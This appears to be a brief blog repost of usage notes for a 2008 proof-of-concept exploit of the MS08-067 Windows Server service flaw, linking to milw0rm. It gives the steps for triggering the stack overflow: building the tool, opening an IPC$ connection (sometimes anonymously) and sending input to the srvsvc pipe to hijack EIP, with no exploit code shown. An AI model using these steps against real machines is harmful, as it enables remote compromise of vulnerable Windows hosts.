I download the PoC as sample for own research purpose. To get the thread from original, you can get it from http://www.milw0rm.com/exploits/6824
**********************************************************
In vstudio command prompt:*********************************************************
mk.bat
next:
attach debugger to services.exe (2k) or the relevant svchost (xp/2k3/...)
net use \\IPADDRESS\IPC$ /user:user creds
die \\IPADDRESS \pipe\srvsvc
In some cases, /user:"" "", will suffice (i.e., anonymous connection)
You should get EIP -> 00 78 00 78, a stack overflow (like a guard page
violation), access violation, etc. However, in some cases, you will get
nothing.
This is because it depends on the state of the stack prior to the "overflow".
You need a slash on the stack prior to the input buffer.
So play around a bit, you'll get it working reliably...
poc:
http://milw0rm.com/sploits/2008-ms08-067.zip
# milw0rm.com [2008-10-23]
0 comments:
Post a Comment